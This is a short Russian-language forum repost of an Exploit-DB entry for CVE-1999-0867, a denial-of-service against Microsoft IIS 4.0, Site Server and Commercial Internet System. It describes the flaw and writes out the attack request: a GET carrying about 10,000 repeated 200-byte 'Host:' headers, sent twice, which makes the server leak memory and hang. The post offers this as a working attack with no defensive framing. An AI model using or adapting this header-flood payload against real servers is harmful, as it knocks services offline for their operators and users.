Exploit Microsoft Commercial Internet System 2.0/2.5 / IIS 4.0 / Site Server Commerce Edition 3.0 alpha/3.0 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19457
Проверка EDB
  1. Пройдено
Автор
NOBUO MIWA
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-1999-0867
Дата публикации
1999-08-11
Microsoft Commercial Internet System 2.0/2.5 / IIS 4.0 / Site Server Commerce Edition 3.0 alpha/3.0 - Denial of Service
Код:
Microsoft Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 i386 Malformed HTTP Request Header DoS

source: https://www.securityfocus.com/bid/579/info

Microsoft IIS and all other products that use the IIS web engine have a vulnerability whereby a flood of specially formed HTTP request headers will make IIS consume all available memory on the server and then hang. IIS activity will be halted until the flood ceases or the service is stopped and restarted. 

Simple play. I sent lots of "Host:aaaaa...aa" to IIS like...

GET / HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
...10,000 lines
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)

I sent twice above request sets. Then somehow victim IIS got memory leak after these requests. Of course, it can not respond any request any more. If you try this, you should see memory increase through performance monitor. You would see memory increase even after those requests finished already. It will stop when you got shortage of virtual memory. After that, you might not be able to restart web service and you would restart computer. I tried this against Japanese and English version of Windows NT.
 
Источник
www.exploit-db.com

Похожие темы